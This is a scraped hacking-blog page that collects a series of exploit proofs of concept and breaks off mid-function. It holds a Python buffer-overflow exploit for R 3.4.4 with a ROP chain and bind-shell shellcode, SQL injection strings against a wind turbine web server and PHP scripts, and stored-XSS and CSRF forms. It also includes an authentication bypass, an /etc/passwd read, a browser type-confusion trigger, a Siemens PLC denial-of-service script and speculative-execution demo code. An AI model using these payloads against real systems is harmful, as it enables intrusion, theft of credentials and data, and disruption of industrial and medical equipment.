<!--
Teradek Slice 7.3.15 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: Firmware Version: 7.3.15 (build 31735)
Hardware Version: 2.1
Summary: Built on the award-winning Cube platform, Slice is a rack mount
HEVC / H.264 codec designed to fit seamlessly into your broadcast studio.
Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O,
Ethernet and WiFi connectivity, and full duplex IFB.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5467
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863570704
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
# Exploit Author: Hashim Jawad
# Exploit Date: 2018-05-21
# Vendor Homepage: https://www.r-project.org/
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
# Credit to bzyo for finding the bug (44516)
#!/usr/bin/python
import struct
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
#Payload size: 718 bytes
shellcode = ""
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''
rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x90909090) # nop
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]
buffer = '\x41' * 292 # filler to EIP
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]
buffer += '\x41' * 4 # compensate for pop esi
buffer += rop
buffer += '\x90' * 50
buffer += shellcode
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
try:
f=open('payload.txt','w')
print '[+] Creating %s bytes evil payload..' %len(buffer)
f.write(buffer)
f.close()
print '[+] File created!'
except Exception as e:
print e
# Exploit Title: Nordex N149/4.0-4.5 Wind Turbine Web Server - SQL Injection
# Date: 21-05-2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.nordex-online.com
# Tested on: Windows
# Version: N149/4.0-4.5 Wind Turbine
# Category: webapps
---> Proof Of Concept
-------- > Request
POST /php/login.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept: */*
Referer: http://IpAdress//
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: IPAdress
Accept-Encoding: gzip, deflate
Content-Length: 304
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=3
-------- > Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 261
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Date: Wed, 16 May 2018 10:49:31 GMT
Vary: Accept-Encoding
<br />
<b>Warning</b>: mysqli::query(): (23000/1062): Duplicate entry
'_!@4dilemma:1' for key 'group_key' in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>46</b><br />
<br />
<b>Notice</b>: Trying to get property of non-object in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>47</b><br />
FALSE<br />
<b>Fatal error</b>: Call to a member function free() on boolean in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>67</b><br />
# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - Persistent cross site scripting
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327
# Version: 1.5
# Tested on: Windows
# POC :
1) Create your account and navigate to "Edit profile"
2) Put this payload into textarea :
</textarea><script>console.log(document.cookie)</script>
3) The payload will be executed if someone opens your profile .
# Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery
# Google Dork: -
# Date: 2018-05-21
# Exploit Author: Safak Aslan
# Vendor Homepage: http://www.merge.com/
# Version: Merge PACS 7.0
# Tested on: Windows
# CVE: -
# 1. Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://targetIP/servlet/actions/merge-viewer/summary" method="POST">
<input type="hidden" name="amicasUsername" value="merge" />
<input type="hidden" name="password" value="viewer" />
<input type="hidden" name="submitButton" value="Login" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Post Data:
POST /servlet/actions/merge-viewer/summary HTTP/1.1
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D
Connection: close
Upgrade-Insecure-Requests: 1
amicasUsername=merge&password=viewer&submitButton=Login
# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29
# Version: 1.0
# Tested on: Kali linux
# Description:
#Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities :
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.domain)</script>
3) You will have an alert box in the page .
# POC 2 : CSRF : cross site request forgery :
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://model.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="200000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://model.thesoftking.com/admin/setgeneral.php"
method="post">
<input name="name" value="test" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="1000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
# POC 3 : Authentication bypass :
# Attacker can bypass admin panel without any authentication :
Path : /admin
Username : ' or 0=0 #
Password : anything
# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://bylancer.com
# Version: 1.5
# Tested on: Kali linux
====================================================
# POC 1 : SQLi :
Parameter : hashtag
type : Union based
http://test.com/chat/hashtag?hashtag=[SQL]
# test :
http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23
# Payload : -1' UNION SELECT
NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()%23
====================================================
Parameter : v
type : time-based blind
test.com/chat/me?action=edit&v=[SQL]
# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23
# Payload : AND sleep(10)%23
====================================================
# POC 2 : CSRF :
# CSRF vulnerability allows attacker to change user's information.
In this script we have anti-csrf which we can't change user's information
without token.
So we use 'hashtag' parameter to set our encoded payload and bypass csrf
protection : chat/hashtag?hashtag=[We have Reflected XSS here]
# Exploit :
<form action="http://test.com/chat/data_settings.php" method="POST">
<input type="hidden" name="csrf_token" value="" />
<input type="hidden" name="Wall"
value="Hello would you like to be my friend" />
<input type="hidden" name="user" value="lord225" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="mail"
value="d3code.n@gmail.com" />
<input type="hidden" name="website" value="test" />
<input type="hidden" name="sex" value="male" />
<input type="hidden" name="country"
value="------" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="Language" value="en" />
</form>
<script>
var token = '';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var setPage = this.responseXML;
token = setPage.forms[1].elements[0].value; // get token
console.log(token);
}
}
req.open("POST","/chat/settings",true);
req.setRequestHeader("content-type","application/x-www-form-urlencoded");
req.responseType = "document";
req.send();
document.forms[0].elements[0].value = token; // set token to our form
document.forms[0].submit();
</script>
=====================================================
# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection
# Exploit Date: 2018-05-19
# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365
# Author: Mehmet Onder Key
# Version: 1.0
# Tested On: Linux
# 1. Description
# Any visitor can run code to exploit css and sql vulnerabilities in the
# products and order sections.
# 2. Proof of Concept
# Example parameter with demo site : http://demo.codepaul.com/
# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf&
# paper=300g_ma&refinement=lamco
# Time-Based Blind SQL Payload:
format=keyney+akkus') OR SLEEP(5)-- DLea
# Boolean-Based Blind SQL Payload:
refinement=were') OR NOT 4134=4134#
# Error-Based SQL Payload
paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT
(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz
etc... (all parameter is effected -pricelist)
# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1
test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X.
# Tested on: Kali Linux
# CVE: CVE-2014-2908
http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=
<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img
src=x onerror=prompt(1);>&Send=Filter
# Exploit Title: WebSocket Live Chat - Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Alireza Norkazemi
# Vendor Homepage: https://codecanyon.net/item/websocket-live-chat-instant-messaging-php/16545798?s_rank=1
# POC :
1) Create your account and click setting icon and go to profile
2) Put this payload into Status box :
<script>alert('xss')</script>
3) The payload will be executed if someone opens your profile
# Exploit Title: Android Application MakeMyTrip 7.2.4 - Unencrypted Database Files
# Date: 2018-05-21
# Software Link: MakeMyTrip v7.2.4 Android Application
# Exploit Author: Divya Jain
# Version: 7.2.4 Android App
# CVE: CVE-2018-11242
# Category: Mobileapps
# Tested on: Android v5.1
# 1. Description
# Android application folder was found to contain SQLite database files in the following subdirectory
# data/com.makemytrip/Cache and data/com.makemytrip/databses. This directory is used to store the application’s databases.
# The confidential information can be retrieved from the SQLite databases and stored in cleartext.
# As an impact it is known to affect confidentiality, integrity, and availability.
# 2. Proof-of-Concept
# The successful exploitation needs a single authentication and filesystem can be accessed, after rooting an android device.
# After accessing the directories below
/data/com.makemytrip/databases/
/data/com.makemytrip/cache/
# Above directories can be seen with unencrypted version of database files stored in the device
# which can further lead to sensitive information disclosure.
/*
BOOL JavascriptNativeFloatArray::SetItem(uint32 index, double dValue)
{
if (*(uint64*)&dValue == *(uint64*)&JavascriptNativeFloatArray::MissingItem)
{
JavascriptArray *varArr = JavascriptNativeFloatArray::ToVarArray(this);
varArr->DirectSetItemAt(index, JavascriptNumber::ToVarNoCheck(dValue, GetScriptContext()));
return TRUE;
}
this->DirectSetItemAt<double>(index, dValue);
return TRUE;
}
As you can see above, if the double value given as the parameter equals to JavascriptNativeFloatArray::MissingItem, it converts the float array to a var array. Since the input value is not checked in the JITed code, it can lead to type confusion.
*/
function opt(arr, value) {
arr[1] = value;
arr[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 0x10000; i++)
opt([1.1], 2.2);
let arr = [1.1];
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
print(arr);
}
main();
# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux
# POC 1 : Cross-Site scripting:
1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page .
# POC 2 : Cross-Site Scripting:
1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases , the payload will be executed after someone opens your
album or your profile.
# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .
# Change email Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
<input type="hidden" name="em" value="lord2@gmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Result :
# html "The information has been updated"
# status "OK"
# message ""
# Delete account Exploit:
<img src="
http://Target/isocial/demo/services/actionssetting/delete">
# Exploit Title: ERPnext 11.x.x - Cross-Site Scripting
# Date: 2018-05-10
# Exploit Author: Veerababu Penugonda
# Vendor Homepage: https://erpnext.com/
# Software Link: https://demo.erpnext.com/
# Version: Frappe ERPNext v11.x.x-develop
# Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS
# CVE : CVE-2018-11339
# 1. Description:
# https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015
# and functionality “Comment” is vulnerable to XSS like Stored ,
# Reflected , Cookie , possible for more
# 2. Payload :
"><script>alert(1)</script>
# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074
#!/usr/bin/python
import socket import sys from time import sleep if
len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) for x in
range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102))
s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n"
result=s.recv(1024) print result s.close() sleep(7)
/*
======== Intro / Overview ========
After Michael Schwarz made some interesting observations, we started
looking into variants other than the three already-known ones.
I noticed that Intel's Optimization Manual says in
section 2.4.4.5 ("Memory Disambiguation"):
A load instruction micro-op may depend on a preceding store. Many
microarchitectures block loads until all preceding store address
are known.
The memory disambiguator predicts which loads will not depend on
any previous stores. When the disambiguator predicts that a load
does not have such a dependency, the load takes its data from the
L1 data cache.
Eventually, the prediction is verified. If an actual conflict is
detected, the load and all succeeding instructions are re-executed.
According to my experiments, this effect can be used to cause
speculative execution to continue far enough to execute a
Spectre-style gadget on a pointer read from a memory slot to which a
store has been speculatively ignored. I have tested this behavior on
the following processors from Intel and AMD:
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]
- AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]
I haven't yet tested this on any ARM CPU.
Interestingly, only on the Skylake laptop, it seems to work when
interrupts and SMP are disabled while the test is running; on the
other machines, it seems to only work when interrupts are enabled,
maybe because the kernel code cause some noise that garbles some
predictor state or so? Or just because they mess up timing
somewhere...
There were mentions of data speculation on the netdev list, in a
somewhat different context:
https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html
https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html
However, I'm not entirely sure about the terminology. Do
"data speculation" and "value speculation" include speculating about
the *source* of data, or do they refer exclusively to directly
speculating about the *value* of data?
======== Demo code (no privilege boundaries crossed) ========
This is some code that purely demonstrates the basic effect and shows
that it is possible to combine it with a Meltdown/Spectre-style
gadget for leaking data into the cache. It does not cross any
privilege boundaries.
----------------------- START -----------------------
// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}
// optionally add: -DNO_INTERRUPTS
#include <stdio.h>
#include <sys/io.h>
#include <err.h>
#include <sys/mman.h>
#define pipeline_flush() asm volatile("mov $0,
%%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ :
"rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
// source of high-latency pointer to the memory slot
unsigned char **flushy_area[1000];
#define flushy (flushy_area+500)
// memory slot on which we want bad memory disambiguation
unsigned char *memory_slot_area[1000];
#define memory_slot (memory_slot_area+500)
// 0123456789abcdef
unsigned char secret_read_area[] = "0000011011101011";
unsigned char public_read_area[] = "################";
unsigned char timey_line_area[0x200000];
// stored in the memory slot first
#define timey_lines (timey_line_area + 0x10000)
unsigned char dummy_char_sink;
int testfun(int idx) {
pipeline_flush();
*flushy = memory_slot;
*memory_slot = secret_read_area;
timey_lines['0' << 12] = 1;
timey_lines['1' << 12] = 1;
pipeline_flush();
clflush(flushy);
clflush(&timey_lines['0' << 12]);
clflush(&timey_lines['1' << 12]);
asm volatile("mfence");
pipeline_flush();
// START OF CRITICAL PATH
unsigned char **memory_slot__slowptr = *flushy;
//pipeline_flush();
// the following store will be speculatively ignored since its
address is unknown
*memory_slot__slowptr = public_read_area;
// uncomment the instructions in the next line to break the attack
asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ :
/*in*/ : "rax","rbx","rcx","rdx","memory");
// architectual read from dummy_timey_line, possible
microarchitectural read from timey_line
dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];
// END OF CRITICAL PATH
unsigned int t1, t2;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '0')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_0 = t2 - t1;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '1')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_1 = t2 - t1;
if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {
pipeline_flush();
